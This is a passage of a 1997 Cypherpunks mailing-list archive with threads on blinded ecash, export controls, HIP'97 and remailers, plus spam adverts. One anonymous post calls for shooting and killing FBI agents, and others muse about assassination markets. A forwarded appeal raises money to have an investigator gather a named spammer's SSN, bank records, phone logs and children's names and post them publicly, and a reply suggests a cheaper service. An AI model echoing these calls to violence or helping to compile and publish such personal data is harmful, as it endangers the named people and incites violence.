person, the truth apparently will continue to be another casualty
of this misguided law.


Vinnie Moscaritolo
Apple's Key Escrow Agent (for now)
http://www.vmeng.com/vinnie/
PGP:      4FA3298150E404F2782501876EA2146A
DSS/DH:   B36343A790489C8D4E149147D57A7566C206F586

1 if by land, 2 if by sea.
	 Paul Revere - encryption 1775

--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From alan at ctrl-alt-del.com  Fri Aug 15 10:42:55 1997
From: alan at ctrl-alt-del.com (Alan)
Date: Sat, 16 Aug 1997 01:42:55 +0800
Subject: Getting ecash without an MTB account
In-Reply-To: <3.0.3.32.19970815144631.00989bd0@localhost>
Message-ID: 



On Fri, 15 Aug 1997, Mike wrote:

> Jeremey Barrett wrote:
> >BTW, there are better solutions to operating without a mint account,
> >but they are not widely available yet.
> 
> Are you referring to the receiver anonymous protocol?
> 
> This is how I understand that protocol,
> 
> Alice wants to receive e$1 from Bob. She creates a random number, blinds
> it, and gives the blinded number to Bob. He shows the number to the
> Mint, asking for a withdrawal of e$1 with a signature on this coin
> number. Bob gives the signed and still blinded coin to Alice. She
> unblinds it and spends it, end of story.

Actually the coin is intercepted and spent by Mallet.  Alice gets pissed
at Bob because she feels cheated by him.  She implements a blinding
protocol on him with an ice pick, as described by Dr. Thomas Dolby.
("Blinded with Ice Picks and/or Science")

> I thought that in this scenario, Bob can spend the coin before he gives
> it to Alice, so she runs the risk of receiving a coin that has already
> been spent. Is it impossible to spend a blinded coin if you can't
> unblind it? Or are you thinking of something totally different?

My understanding of the protocol is that the identity of the purchacer is
revealed only if the coin is double spent.  What prevents the person
wanting to find out the identity of Bob from just spending the cash more
than once?

alan at ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.






From nospam-seesignature at ceddec.com  Fri Aug 15 11:08:16 1997
From: nospam-seesignature at ceddec.com (nospam-seesignature at ceddec.com)
Date: Sat, 16 Aug 1997 02:08:16 +0800
Subject: Cartel Leaders Set Snipers To Work In Border War
In-Reply-To: <199708150714.AAA08918@you.got.net>
Message-ID: <97Aug15.135618edt.32257@brickwall.ceddec.com>



On Fri, 15 Aug 1997, Tim May wrote:

> According to this article, the home addresses of government agents are
> being solicited by Mexican drug dealers, for disposal of agents
> interfering in their business.
> 
> Between anonymous remailers and payment systems, a real Assassination
> Politics market could be set up. Don't even need untraceable e-cash,
> though this would be better.
> 
> Glad I'm not a DEA or INS agent.
> 
> --Tim May

Or, if our government actually got smart, they could offer a bounty on the
Mexican drug lords.  There are a lot more poor people in mexico.  A
Mequilladora (spelling?) to export drug policy?  I think if they offered
to make Tijuiana a protectorate and infuse a billion or two in cash after
the last drug lord was eliminated the border problems would cease.

If you wanted to use individual bounties, the problem is proving that you
were the one who killed the target.  Snipers usually can't wait around to
collect the scalp (Encrypted VCR through the viewfinder maybe?).

I think that Harry Browne suggested this more economic approach to
terrorists in his book and campaign last year.

But the US doesn't consider this "fair".  They would rather send our
military in as they did in Haiti and Panama, have lots of people on both
sides killed, and bring them back for a show trial, or battle to a
stalemate like with Iraq and Somalia.

But instead, they are going to raid the homes of more people who install
central air conditioning so their electric bills go up, which is reported
to the police who cannot concieve of anything except a basement full of
grow-lites over marijuana plants as using any electricity.

10 years from now they will still probably be paying informants in person
with $20 bills with consecutive serial numbers, but only if they insist on
not getting a check or direct deposit :).  Where is BCCI when you need it.

New BCCI - Bits of Credit and Commerce on the Internet.

--- reply to tzeruch - at - ceddec - dot - com ---






From sunder at brainlink.com  Fri Aug 15 11:11:12 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Sat, 16 Aug 1997 02:11:12 +0800
Subject: Remailer hating Nazis (was Re: The BIG Lie (Jesus Confesses))
In-Reply-To: 
Message-ID: 



On Fri, 15 Aug 1997, Anonymous wrote:





This is exactly why I run the cypherpunks filter. Heheheh! :)

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From anon at anon.efga.org  Fri Aug 15 11:14:55 1997
From: anon at anon.efga.org (Anonymous)
Date: Sat, 16 Aug 1997 02:14:55 +0800
Subject: Fascism at Work
Message-ID: 



At 06:30 PM 8/15/97 +0200, you wrote:
>	WASHINGTON (AP) - The Justice Department today closed its
>investigation into whether the FBI's former deputy director tried to
>obstruct an inquiry into the deadly 1992 seige at Ruby Ridge, Idaho,
>saying it lacked evidence to bring criminal charges, governent officials
>said.

The bodies of Weaver's son and wife should be evidence enough!  This is the same verdict as the Texas Border murders, some dick federal agent blows away some innocent civilian, and gets off the hook.

>	The Justice Department decided not to bring charges against former
>FBI Deputy Director Larry Potts or Danny Coulson, Potts' deputy during the
>1992 seige at the remote cabin of white supremacist Randy Weaver, said
>government officials who spoke on condition of anonymity.

To those who say government workers aren't above the law: You're wrong.  Damn wrong.  Almost any of these pricks can kill your children and/or wife, and get away with it.  If anyone bumps these assholes off, I'm gonna applaud.

>The Justice Department informed lawmakers and lawyers for the FBI agents
>that its review did not warrant any further criminal charges, but it left
>open the possibility of disciplinary action.

The only appropriate action is death to the murdering bastards who shot his wife and kid.  Kill the murdering sons of bitches!

>	The department said in a statement obtained by The Associated
>Press, "The available evidence does not support further criminal
>prosecution of FBI officials ... from the August 1992 incident at Ruby
>Ridge."

Dead bodies don't just *happen*, someone makes them dead, in this case, the FBI schills who blew away innocents.  That makes them guilty as sin, and for that, they should die slowly, and painfully.

Someone, please, put some bullet holes in FBI Agents if they ever come to your house.  Someone needs to teach these bastards a lesson.

It seems that everything like this happens because some agency fucks something up.  Waco happened because the BATF ran in like dumbasses and fucked everything up.  At Ruby Ridge, some FBI dick screws up, killing Mr. Weaver's child and wife.  At the Texas B!
order, they blew away a kid with a .22 rifle, while on "Drug Patrol".  What's should be done about these incidents?  Kil those who participated, and make sure to shoot to kill if some agents from a TLA come to YOUR house.

And they wonder why McVeigh said "Enough!"

EnoughMonger
"There's somthing wrong when innocent people die because of fascist use of military forces."






From sunder at brainlink.com  Fri Aug 15 11:41:41 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Sat, 16 Aug 1997 02:41:41 +0800
Subject: Cartel Leaders Set Snipers To Work In Border War
In-Reply-To: <97Aug15.135618edt.32257@brickwall.ceddec.com>
Message-ID: 



On Fri, 15 Aug 1997 nospam-seesignature at ceddec.com wrote:

> Or, if our government actually got smart, they could offer a bounty on the
> Mexican drug lords.  There are a lot more poor people in mexico.  A
> Mequilladora (spelling?) to export drug policy?  I think if they offered
> to make Tijuiana a protectorate and infuse a billion or two in cash after
> the last drug lord was eliminated the border problems would cease.

Of course they aren't going to do that.  The FEDs make way too much money
on the drugs anyway.  If they weren't, they would have closed down the
trade a long time ago, or legalized it to make money off the taxes.  It's
all ecconomic.  But they're making much more money this way than if it
were sold and taxed legally.

Everything that's illegal comes down to tax money.  From drugs to
prostition to murder to gambling.  Yes, even suicide: if you kill
yourself, you won't work, so they get less tax money. 
 
> But the US doesn't consider this "fair".  They would rather send our
> military in as they did in Haiti and Panama, have lots of people on both
> sides killed, and bring them back for a show trial, or battle to a
> stalemate like with Iraq and Somalia.

Hey, them marines and army boys need to cut their teeth on some real
action once in a while or else they get soft, wouldn't want that, would
we?

If I remember my history correctly, and I probably don't, either FDR or
Teddy, durring the depression hired two sets of crews of people.  On set
to dig a ditch, the other to fill it, and the next day it would be dug
again, so that they could have jobs and get paid and stimulate the
ecconomy.  

Same deal.  Military get target practice, Feds capture and resell the
dope, buy weapons to sell to Iran or whatever, local cops bust down the
door, the hardware and home supply stores get money in sales and
installation of doors and windows busted by the local cops, etc...  Only
ones who wind up losing are the citizen units.  The drug dealers aren't
hurt much.  Sure they need to ice one or two off every once in a while to
give the appearance of a justice system, but, the rest go out on the
street to sell again. 
 
> But instead, they are going to raid the homes of more people who install
> central air conditioning so their electric bills go up, which is reported
> to the police who cannot concieve of anything except a basement full of
> grow-lites over marijuana plants as using any electricity.

Of course, keeps the citizen units in line.  And heck with the new laws
pretty soon they'll be applied to EVERYTHING, not just business with
guns... pretty soon they'll raid people's homes and confiscate everything
whether they find something illegal or not... just to hold it for 50-200
years for um, evidence, yeah, um, that's it.  And boy, that's a mighty
fine leather couch the Jones bought yesterday, you know, we should raid
them just incase it's full of heroin, them cushions are mighty soft, no?
And heck, we just happen to have a perfect spot for it in our precinct
recreation room. :)

And boy, that land on Ruby Ridge looks mighty fertile, you know I bet
they're growing marijuana plants in the trees...  We could use it to build
a park, heck...

And shit that Koresh compound, let's burn it and say they commited suicide
and raped their kids... we could use the land and come out looking good...

> 10 years from now they will still probably be paying informants in person
> with $20 bills with consecutive serial numbers, but only if they insist on
> not getting a check or direct deposit :).  Where is BCCI when you need it.

Naw, that's not how it's done, they'll pay'em with counterfit $20's and
then arrest them when they hit the grocery store to buy a six pack and
some milk, then when they get'em at the stationhouse they'll stuff'em in
the bathroom to be sodomized and beat up with toilet plungers and brooms. 

Heck, it wouldn't surprise me if the cops had a small dope quota every
month to plant as evidence in the cars of the people they ticket for
speeding, or having tinted windows, or actually using their turn signal
lights.   And hey, here's a thought, let's pass some more laws and like
confiscate cars that are speeding.  Heck, we ain't makin' enough money as
is from stealing cars off the street for parking for more than five
minutes...


=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From aba at dcs.ex.ac.uk  Fri Aug 15 12:46:23 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Sat, 16 Aug 1997 03:46:23 +0800
Subject: Bringing Adam Back for Trial
In-Reply-To: 
Message-ID: <199708151935.UAA02304@server.test.net>




Tim May  writes:
> At 2:05 AM -0700 8/15/97, Bill Stewart wrote:
> >At 05:35 AM 8/14/97 +0000, Vipul Ved Prakash wrote:
> >
> >Since then, they've changed the laws, and the PERL RSA has gotten shorter...
> >
> >Of course, it's not a violation for Adam - he's not an American :-)
> 
>  But of course Adam was seen within U.S. borders wearing such a
> shirt. This means the act of importation had occurred, regardless of
> where Adam came from (and regardless of where the shirt was made,
> etc.).

Made in UK, imported into US from UK, and then re-exported.

> And once imported, code becomes subject to all of the usual ITARs and
> related laws. (They changed the name "ITAR" to something else, which I've
> forgotten...no doubt 5 people will post one-liners telling me what it is.)

EAR.  But it was still ITAR at the time.

> So unless Adam disposed of this shirt, to a bonafide American or
> America-approved subject, before his departure from the U.S. last summer....

Nope, I wore it out again (under another garment -- concealed
munitions).  Had another one in my luggage which they searched.  My
luggage was searched on the way in and on the way out, and lots of
nosy questions were asked too.  Walked straight through both times in
the UK.

> Perhaps a DEA snatch team can be pressed into service to nab him in
> England, drug him, wrap him in tarps, and spirit him onto a C-5
> cargo plane headed for the Land of the Freeh.

That'd be nice, a freeh holiday :-)

There are I think a number of US people who have worn them through US
borders.  Perhaps we should collectively turn ourselves in and demand
they enforce the law.

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0
Message-ID: 



>--- begin forwarded text
>
>
>Date: Fri, 15 Aug 1997 18:34:22 +0200 (MET DST)
>Subject: Reducing Crypto-Anonymous Crime by 50%
>To: cypherpunks at toad.com
>From: nobody at replay.com (Anonymous)
>Organization: Replay and Company UnLimited
>X-001: Replay may or may not approve of the content of this posting
>X-002: Report misuse of this automated service to 
>X-URL: http://www.replay.com/remailer/
>Sender: owner-cypherpunks at cyberpass.net
>Precedence: bulk
>Reply-To: nobody at replay.com (Anonymous)
>X-Loop: cypherpunks at cyberpass.net
>
>Mike wrote:
>> Alice wants to receive e$1 from Bob. She creates a random number, blinds
>> it, and gives the blinded number to Bob. He shows the number to the
>> Mint, asking for a withdrawal of e$1 with a signature on this coin
>> number. Bob gives the signed and still blinded coin to Alice. She
>> unblinds it and spends it, end of story.
>
>  It seems to me that many of the government's fascist goals for
>stopping strong crypto and anonymous financial transactions could
>be realized merely by whacking out Alice and Bob.

My analysis indicates that both risk and effort could be halfed by just
wacking Alice with the same net effect.  I'm passing on this suggestion to
the operations desk.








From sunder at brainlink.com  Fri Aug 15 13:25:54 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Sat, 16 Aug 1997 04:25:54 +0800
Subject: Getting back at spamford (fwd)
Message-ID: 




=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================

Begin message:
Subject:      Need contributions to slow Cyberpromotions down..
From:         Peter Cumming 
Message-Id:   <3363AD45.357E at ix.netcom.com>
Organization: Netcom
Reply-To:     pcumming at ix.netcom.com
Newsgroups:   news.admin.net-abuse.email

I have found a Private Investigator within distance of Sanford Wallace
Cyberpromotions business to look into his affairs personally. All
results will be posted on the webpages of those who have one (I do not)
and all newsgroups.

The PI quoted $1,000. I will put up $250 and had some others add some
money but we are not even halfway there. So pass the word and some money
if you care to be a part of the following.

The info that the PI will obtain will consist of (for Sanford W) DOB,
DMV, Car type, Tag#, Bank accounts, home number, cell number, phone
calls made in last 30 days, childrens name, home address, SSN, bank
cards held, credit report, etc.. 
 
I do not have $1,000 this year to throw at this but if you are
interested in helping out or have better ideas let me know. I will put
in $250. No checks will be sent to me, all to the PI if we come up with
the necessary $1,000. Also will need some good volunteers to put out
some web pages with the info I post. It is up to whomever to use the
info as they see fit. It is not my responsibility.

Thanks,

Peter
 







From remailer at bureau42.ml.org  Fri Aug 15 13:54:53 1997
From: remailer at bureau42.ml.org (bureau42 Anonymous Remailer)
Date: Sat, 16 Aug 1997 04:54:53 +0800
Subject: why not cyberian?
Message-ID: 



Everyone's so fond of promoting the RC5 effort run by distributed.net.  Why
aren't more people using the Cyberian software from cyberian.org?  The
clients are faster, and instead of blowing the money on Project Gutenberg - a
dubious cause, to be sure - a healthy chunk goes right to the winner.

RC5Monger (aka GreedMonger)






From markm at voicenet.com  Fri Aug 15 14:30:37 1997
From: markm at voicenet.com (Mark M.)
Date: Sat, 16 Aug 1997 05:30:37 +0800
Subject: Getting ecash without an MTB account
In-Reply-To: 
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 15 Aug 1997, Alan wrote:

> > I thought that in this scenario, Bob can spend the coin before he gives
> > it to Alice, so she runs the risk of receiving a coin that has already
> > been spent. Is it impossible to spend a blinded coin if you can't
> > unblind it? Or are you thinking of something totally different?
> 
> My understanding of the protocol is that the identity of the purchacer is
> revealed only if the coin is double spent.  What prevents the person
> wanting to find out the identity of Bob from just spending the cash more
> than once?

There are two ways of handling the double spending problem.  One is online
clearing where the bank keeps a database of all deposited coins.  The
merchant immediately deposits the coin and the bank compares it to a
database of all spent coins.  If the coin has already been spent, the bank
sends an error message to the merchant, and presumably, the transaction
is halted.  If the coin has not been spent, the bank adds the coin to its
database of spent coins and credits the merchant's account.  This simply
prevents double spending and does not attempt to identify the person
responsible.

The other protocol is very complex and involves an interactive protocol
to reveal one half of the payer's identity which is split using a simple
XOR.  When a coin is double spent using this protocol, the payer's identity
is revealed.  I don't know if this protocol can be used for double-blinded
coins, but even if it could, there wouldn't be many advantages over
online clearing.




Mark
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBM/SqvyzIPc7jvyFpAQHvnAf+I0M5S/SIurUtHVtnuGha/k/AjhkCocJJ
iRxXti3Gqn5ifs05NU9VvR7G0eNTuPBMHfvFveR5uanc222iOKZzCpgJKSqxPHU2
MvcK6e76q67NGHf3ypadZsqAU7GAcT6DGWWt8chq7FKtzAZg9Nv1VIyof2Mw68dw
R9UiQEh7NX6YvvJa7I9tcALbCvJUEvhMPV6WEu7lKCKTNchdSdEOth5EZrgvvQAZ
bx3pqa+yPhzRn2AJ62HmhMxqEtDfKWyIfB7lvmXJ6a1P/BzMfo+ZELa1qlmd6X+u
C0+qzBqEtvxgxWmFm5CwKD02dRv/KuxNIIE/83Z216lTT8WTnoG9JA==
=GrB9
-----END PGP SIGNATURE-----






From 01450468 at gte.net  Sat Aug 16 06:22:21 1997
From: 01450468 at gte.net (01450468 at gte.net)
Date: Sat, 16 Aug 1997 06:22:21 -0700 (PDT)
Subject: 24 Hour Approval, Low Lease Rates
Message-ID: <189702170025GAA08045@laiteis.com>



---------------------------------------------------------------------------------------------------------------------
    This advertisement brought to you by Email Power, as a person
     interested in leasing equipment at very favorable rates if we have
     sent  this to you by mistake, please accept our apology , to be
     removed from this list see the instructions below thank you!
---------------------------------------------------------------------------------------------------------------------                                                                                                                              
Heritage Pacific Leasing , one of the leading lease companies today,
currently has an abundance of funds available for NEW leasing Clients!!

Our Lease Plans have provided affordable solutions, and  funds
for every conceivable type of equipment!!

Whether you are in need of a new computer, or fax machine, or a whole
new fully equiped office, or business, even manufacturing or farming
equipment , we are your solution!!

We offer very competitive rates, E-Z qualifying, and approval in as
little as 24 hours!! 

Remember a properly designed lease program provides additional
TAX advantages over more conventional methods of financing and 
typically cost less in terms of  $$CA$H FLOW$$

Let us show you how E-Z and FAST, we can design a lease for YOU, 
email our autoresponder now, for more information and an E-Z
application Form!!

mailto:netpower at answerme.com

To be removed from this list please put remove in the subject and
mailto:removemenow at answerme.com

Questions or advertising rates from EmailPower? mailto:promotions at answerme.com

    








From jamesd at echeque.com  Fri Aug 15 15:54:18 1997
From: jamesd at echeque.com (James A. Donald)
Date: Sat, 16 Aug 1997 06:54:18 +0800
Subject: FCPUNX:McVeigh on McVeigh
Message-ID: <199708152236.PAA11230@proxy4.ba.best.com>



He who pays controls.

If someone is charged with a politically sensitive crime, and he has
a court appointed attorney, then he has two prosecutors and no
defense.

Very likely Mcviegh is guilty, but I could have defended him
better, and so could my dog.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From dlv at bwalk.dm.com  Fri Aug 15 15:57:38 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 16 Aug 1997 06:57:38 +0800
Subject: Getting back at spamford (fwd)
In-Reply-To: 
Message-ID: 



Ray Arachelian  writes:

> Subject:      Need contributions to slow Cyberpromotions down..
> From:         Peter Cumming 

Cummings is a dangerous nut.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From daniel at darwindigital.com  Fri Aug 15 16:40:23 1997
From: daniel at darwindigital.com (Daniel Zen)
Date: Sat, 16 Aug 1997 07:40:23 +0800
Subject: OpenSoft ExpressMail
Message-ID: <01BCA9AE.E397A0A0.daniel@darwindigital.com>



I am an ex-lurker of this mailing list that is not currently subscribed (so 
make sure I am in the To: or CC: list :).

I wanted to ask the experts on the quality of OpenSoft ExpressMail and how 
it compares to competing products such as PGP for Personal Privacy in terms 
of

security and algorithm's used
ease of use, integration and installation
interoperobility, compatibility and use of standards
OS and e-mail platform availability
export laws (OpenSoft's programming team is in Russia)
etc. (is there something I should know?)

If anybody has an opinion, or a pointer it would be greatly appreciated.

Z






From mnorton at cavern.uark.edu  Fri Aug 15 17:24:26 1997
From: mnorton at cavern.uark.edu (Mac Norton)
Date: Sat, 16 Aug 1997 08:24:26 +0800
Subject: Getting back at spamford (fwd)
In-Reply-To: 
Message-ID: 



there are services that will do this cheaper. Pathfinder
spammed me the other day, in fact, and will get this
stuff, and mortgages, financing statements, etc., for
about $400. We lawyers get these spams all the time,
but I have hear this one kinda works.
MacN

On Fri, 15 Aug 1997, Ray Arachelian wrote:

> 
> =====================================Kaos=Keraunos=Kybernetos==============
> .+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
> ..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
> <--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
> ../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
> .+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
> ======================= http://www.sundernet.com ==========================
> 
> Begin message:
> Subject:      Need contributions to slow Cyberpromotions down..
> From:         Peter Cumming 
> Message-Id:   <3363AD45.357E at ix.netcom.com>
> Organization: Netcom
> Reply-To:     pcumming at ix.netcom.com
> Newsgroups:   news.admin.net-abuse.email
> 
> I have found a Private Investigator within distance of Sanford Wallace
> Cyberpromotions business to look into his affairs personally. All
> results will be posted on the webpages of those who have one (I do not)
> and all newsgroups.
> 
> The PI quoted $1,000. I will put up $250 and had some others add some
> money but we are not even halfway there. So pass the word and some money
> if you care to be a part of the following.
> 
> The info that the PI will obtain will consist of (for Sanford W) DOB,
> DMV, Car type, Tag#, Bank accounts, home number, cell number, phone
> calls made in last 30 days, childrens name, home address, SSN, bank
> cards held, credit report, etc.. 
>  
> I do not have $1,000 this year to throw at this but if you are
> interested in helping out or have better ideas let me know. I will put
> in $250. No checks will be sent to me, all to the PI if we come up with
> the necessary $1,000. Also will need some good volunteers to put out
> some web pages with the info I post. It is up to whomever to use the
> info as they see fit. It is not my responsibility.
> 
> Thanks,
> 
> Peter
>  
> 
> 
> 






From shamrock at netcom.com  Fri Aug 15 17:24:31 1997
From: shamrock at netcom.com (Lucky Green)
Date: Sat, 16 Aug 1997 08:24:31 +0800
Subject: Thanks again to the HIP'97 team
Message-ID: <3.0.2.32.19970816020856.006c55d8@netcom10.netcom.com>



I am just starting to catch up on my email. Organizing the Cypherpunks
presence (and the Cypherpunks entertainment program :) at HIP was quite an
effort and the site clean-up took a while as well. But I am pretty certain
that everybody that was there will attest that the experiences was worth
every bit of work that went into it. I would be hard pressed to come up
with an example of when I had so much fun for so long.

My thanks go out to the PGP 5.0 proofreading team that kept working 24 hour
a day even in the midst of a raging techno tent party. Ian Gigg,
Autonomasia, Mark Cox, and the late night networking crew from the Field
HQ, you guys rule. 
Special thanks to Rop and Maurice for organizing the festival in the first
place.

See you all in four years for Hacking At Large: HAL2001.




--Lucky Green 
  PGP encrypted mail preferred.
  DES is dead! Please join in breaking RC5-56.
  http://rc5.distributed.net/






From nobody at neva.org  Fri Aug 15 17:28:41 1997
From: nobody at neva.org (Neva Remailer)
Date: Sat, 16 Aug 1997 08:28:41 +0800
Subject: Reducing Crypto-Anonymous Crime by 50% / Re: Getting ecash without an MTB account
Message-ID: <199708160015.TAA10733@dfw-ix9.ix.netcom.com>




Mike wrote:
> Alice wants to receive e$1 from Bob. She creates a random number, blinds
> it, and gives the blinded number to Bob. He shows the number to the
> Mint, asking for a withdrawal of e$1 with a signature on this coin
> number. Bob gives the signed and still blinded coin to Alice. She
> unblinds it and spends it, end of story.

  It seems to me that many of the government's fascist goals for
stopping strong crypto and anonymous financial transactions could
be realized merely by whacking out Alice and Bob.
  An analysis of the cypherpunks list archives shows that most of
the undesirable activities being perpetrated in the crypto-anonymity
arena are the result of a conspiracy between Alice, Bob, and their
shady friends.
  Anybody know their last names?

A Concerned Cititzen







From nobody at neva.org  Fri Aug 15 17:29:38 1997
From: nobody at neva.org (Neva Remailer)
Date: Sat, 16 Aug 1997 08:29:38 +0800
Subject: ROTFLMAO / Re: Remailer hating Nazis
Message-ID: <199708160014.TAA10673@dfw-ix9.ix.netcom.com>




Anonymous wrote:
> >Patrick Oonk  wrote:
> >Flaming me through a remailer is the equivalent of shouting
> >'hey asshole!' and then running away. Children do it often.
> 
> Maybe you should stop being such an asshole to those children.

  Nothing personal, but I think this guy should consider seeking
professional help for his problems, instead of exposing his dirty
laundry on the cypherpunks list.
  Maybe he would come to the realization that the problem may not
lie with the children and the anonymous remailers.







From ravage at ssz.com  Fri Aug 15 18:23:29 1997
From: ravage at ssz.com (Jim Choate)
Date: Sat, 16 Aug 1997 09:23:29 +0800
Subject: Cartel Leaders Set Snipers To Work In Border War (fwd)
Message-ID: <199708160113.UAA00563@einstein.ssz.com>



Forwarded message:

> Date: Fri, 15 Aug 1997 14:35:28 -0400 (EDT)
> From: Ray Arachelian 
> Subject: Re: Cartel Leaders Set Snipers To Work In Border War

> Of course they aren't going to do that.  The FEDs make way too much money
> on the drugs anyway.  If they weren't, they would have closed down the
> trade a long time ago,

This is clearly wishful thinking...


    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From shamrock at netcom.com  Fri Aug 15 19:03:25 1997
From: shamrock at netcom.com (Lucky Green)
Date: Sat, 16 Aug 1997 10:03:25 +0800
Subject: HIP hip hooray
In-Reply-To: <199708130952.LAA17846@xs1.xs4all.nl>
Message-ID: <3.0.2.32.19970816184751.006b8be0@netcom10.netcom.com>



At 11:52 AM 8/13/97 +0200, Zooko Journeyman wrote:
> A million monkeys operating under the pseudonym 
> "Mark Grant " typed:
>>
>> Hey, Zooko! You were the only Cypherpunk who made the article in the
>> 'Independent' (by that blonde reporter who was wandering around), though
>> Lucky Green was mentioned by name.
>
>
>Wow.  Oh how the mighty have fallen, from an adulatory spread 
>in Wired to a mention in The Independent.  And to think that 
>Lucky was the fellow who was supposed to get the most benefit 
>from the situation in the first place!

Lucky got much benefit from HIP. [What's the smiley for a *huge* grin?]


--Lucky Green 
  PGP encrypted mail preferred.
  DES is dead! Please join in breaking RC5-56.
  http://rc5.distributed.net/






From nobody at REPLAY.COM  Fri Aug 15 20:02:29 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Sat, 16 Aug 1997 11:02:29 +0800
Subject: Getting back at spamford (fwd)
Message-ID: <199708160248.EAA26108@basement.replay.com>



Dr.Dimitri Vulis KOTM wrote:
> 
> Ray Arachelian  writes:
> 
> > Subject:      Need contributions to slow Cyberpromotions down..
> > From:         Peter Cumming 
> 
> Cummings is a dangerous nut.

  All the better...






From remailer at bureau42.ml.org  Fri Aug 15 21:20:49 1997
From: remailer at bureau42.ml.org (bureau42 Anonymous Remailer)
Date: Sat, 16 Aug 1997 12:20:49 +0800
Subject: None
Message-ID: 



bureau42 Anonymous Remailer wrote:
> 
> Everyone's so fond of promoting the RC5 effort run by distributed.net.  Why
> aren't more people using the Cyberian software from cyberian.org?  The
> clients are faster, and instead of blowing the money on Project Gutenberg - a
> dubious cause, to be sure - a healthy chunk goes right to the winner.
> 
> RC5Monger (aka GreedMonger)

  If these people don't even know how to spell "Siberian" then why
should we trust their math skills?
  Not that I'm a troublemaker...

TroubleMakerMonger






From root at firstcounter.com  Sat Aug 16 12:24:38 1997
From: root at firstcounter.com (root at firstcounter.com)
Date: Sat, 16 Aug 1997 12:24:38 -0700 (PDT)
Subject: LINKS
Message-ID: <199708161457.KAA04495@firstmachine.firstcounter.com>


______________________________________________________________________
        If you wish to be removed from our future mailings, please reply with "Remove"
        in the Subject line and we will automatically block you from our future mailings. If you do         anything but instructed you can not be removed automatically.
_________________________________________________________________________

            Are you tired of finding link pages and once listed get no traffic?

            Sick of trying to find places to get you banner displayed for FREE?

            Do you want to increase your traffic and sales?


SEX LINK NETWORK WILL INCREASE TRAFFIC, DISPLAY YOU BANNER ON ALL 
MEMBER SITES -- AND WE WILL DO IT FOR FREE!

The Sex Link Network has just finished beta testing the ultimate link exchange system and is waiting your participation. In less than one week we are already delivering over 250,000 banner impressions a day!

When you become a member of the Sex Link Network today we will give you a listing and detailed description of your site.  PLUS GET FREE BANNER ADVERTISING!

That's right FREE BANNER ADVERTISING! After you have signed up as a Sex Link Network member you need only up-load your banner to our sever and your banner ad is then in rotation.
Your banner will rotate equally on all member sites. Imagine the potential increase in traffic. 

            BEST OF ALL SEX LINK NETWORK DOES NOT COST YOU A CENT!

Get your site listed instantly! Complete  the 60 second registration and your are on the Sex Link Network Site. After you up-load your banner to Sex Link Network your banner ad is placed in automatic rotation - immediately.

Sign up NOW for membership and get more traffic to your site today! 


Sign-up TODAY at  http://www.sexlink.net






From vznuri at netcom.com  Fri Aug 15 21:40:10 1997
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Sat, 16 Aug 1997 12:40:10 +0800
Subject: state power in cyberspace convention
Message-ID: <199708160433.VAA05010@netcom13.netcom.com>




------- Forwarded Message
Date:         Fri, 15 Aug 1997 10:51:09 -0400
From: Kris Millegan  RoadsEnd 
